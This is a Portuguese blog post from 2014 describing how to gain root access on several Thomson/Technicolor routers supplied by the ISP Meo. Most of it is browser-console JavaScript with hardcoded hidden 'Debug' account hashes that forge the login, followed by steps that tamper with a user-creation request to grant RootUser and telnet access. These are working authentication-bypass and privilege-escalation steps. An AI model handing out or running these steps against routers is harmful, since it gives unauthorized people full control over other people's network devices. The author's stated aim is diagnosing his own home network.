POSTED BY

POSTED ON

February 20, 2014

POSTED UNDER

How-To's, ISP's, Pensamentos

COMMENTS

Comments Off on Como ter root num router Thompson

Como ter root num router Thompson

Depois de muitos meses ausentes vou recomeçar a escrever este blog. E vou recomeçar por uma reconfiguração á martelada dos router 799vn do Meo.

Tento tido nas ultimas semanas problemas com o meu router do Meo.Crashes sem razão aparente, tabelas de NAT completamente atravessadas e para ajudar um acesso que não deixa fazer nenhum despiste decente.

Não me interpretem mal. O suporte do 16209 é dos melhores que tenho visto, estando anos luz á frente do que a Zoff tem para oferecer.

No entanto, o problema mantém-se e para tentar perceber o que está a acontecer (acho que tenho algo na minha rede a fazer broadcast storms) impunha-se um acesso decente.

Assim cheguei a esta excelente página: https://ptsec.eu/wp/root-nos-routers-tg784n-com-firmware-10-2-1-d/

O que é la falado efetivamente funciona e aqui vai um cookbook rápido de como ter acesso a todas as configurações e tools de diagnostico destes modems.

1 – Abrir a consola de javascript no browser (+info aqui)

2 – Na aba ‘Console’ inserir o seguinte:

1
2
3
4
5
6
7
 
var user = "Debug";
var hash2 = "91cd28f3d8d3a503e9839caaa2929123";

var HA2 = MD5("GET" + ":" + uri);
document.getElementById("user").value = user;
document.getElementById("hidepw").value = MD5(hash2 + ":" + nonce +":" + "00000001" + ":" + "xyz" + ":" + qop + ":" + HA2);
document.authform.submit();

2.1– Para o TG799:

1
2
3
4
5
6
7
 
var user = "microuser";
var hash2 = "bd739b58aea3a4278d11bff06496a38f";

var HA2 = MD5("GET" + ":" + uri);
document.getElementById("user").value = user;
document.getElementById("hidepw").value = MD5(hash2 + ":" + nonce +":" + "00000001" + ":" + "xyz" + ":" + qop + ":" + HA2);
document.authform.submit();

2.2– Para o TG799vn (10.2.1.D):

1
2
3
4
5
6
7
 
var user = "Debug";
var hash2 = "082d7ff2a82ff89c3f9c5b2356144357";

var HA2 = MD5("GET" + ":" + uri);
document.getElementById("user").value = user;
document.getElementById("hidepw").value = MD5(hash2 + ":" + nonce +":" + "00000001" + ":" + "xyz" + ":" + qop + ":" + HA2);
document.authform.submit();

2.3– Para TG787:

1
2
3
4
5
6
7
 
var user = "Debug";
var hash2 = "1019a97d050c3ef42997740ee54731bf";

var HA2 = MD5("GET" + ":" + uri);
document.getElementById("user").value = user;
document.getElementById("hidepw").value = MD5(hash2 + ":" + nonce +":" + "00000001" + ":" + "xyz" + ":" + qop + ":" + HA2);
document.authform.submit();

2.4– Para TG784n v3:

1
2
3
4
5
6
7
 
var user = "Debug";
var hash2 = "276da5030a939d29642637f279629770";

var HA2 = MD5("GET" + ":" + uri);
document.getElementById("user").value = user;
document.getElementById("hidepw").value = MD5(hash2 + ":" + nonce +":" + "00000001" + ":" + "xyz" + ":" + qop + ":" + HA2);
document.authform.submit();

2.5– Para outras versões:

1
2
3
4
5
6
7
 
var user = "Debug";
var hash2 = "f2bb79a855558478357aa3ef778ffa1a";

var HA2 = MD5("GET" + ":" + uri);
document.getElementById("user").value = user;
document.getElementById("hidepw").value = MD5(hash2 + ":" + nonce +":" + "00000001" + ":" + "xyz" + ":" + qop + ":" + HA2);
document.authform.submit();

3 – E pronto, o login será feito com o utilizador ‘Debug’

 

Para criar outro utilizador com permissões de Root terão que:
Requisitos:
– Firefox
– Tamper Data (link)

1 – Depois de entrar com o método anterior como Debug ir a Ferramentas -> Gestão de Utilizadores

2 – Clicar em Adicionar novo utilizador

3 – Preencher normalmente…no meu caso pus o username admin e a password admin (Não clicar em aplicar)

4 – Abrir o Tamper Data (Ferramentas -> Tamper Data) e clicar Iniciar alteração/Start Tamper

5 – De volta a pagina do router clicar Aplicar

6 – Quando aparecer uma janela do Tamper Data clicar em Alterar/Tamper

7 – Mudar onde diz Administrator para RootUser (sensível a maiúsculas e minúsculas)

8 – Clicar OK

9 – Podem fechar o Tamper Data que o vossos novo utilizador já foi criado com permissões de Root, poderão agora entrar na Telnet com este utilizador para ter acesso total.
Podem ver depois no telnet:

E está feito. Lembrem-se que se meterem os pés pelas mãos, vão mesmo de ter que fazer um hard reset ao router e em seguida configurar ele novamente na sua totalidade. Os moços do 16209 podem dar uma ajuda.

Já posso agora fazer despistes do que se passa na minha rede. Assim que tiver mais dados relevantes partilharei.

Disclamer: Não recomendo NADA que façam algo na configuração do router se não souberem EXATAMENTE o que estão a fazer.

Abr.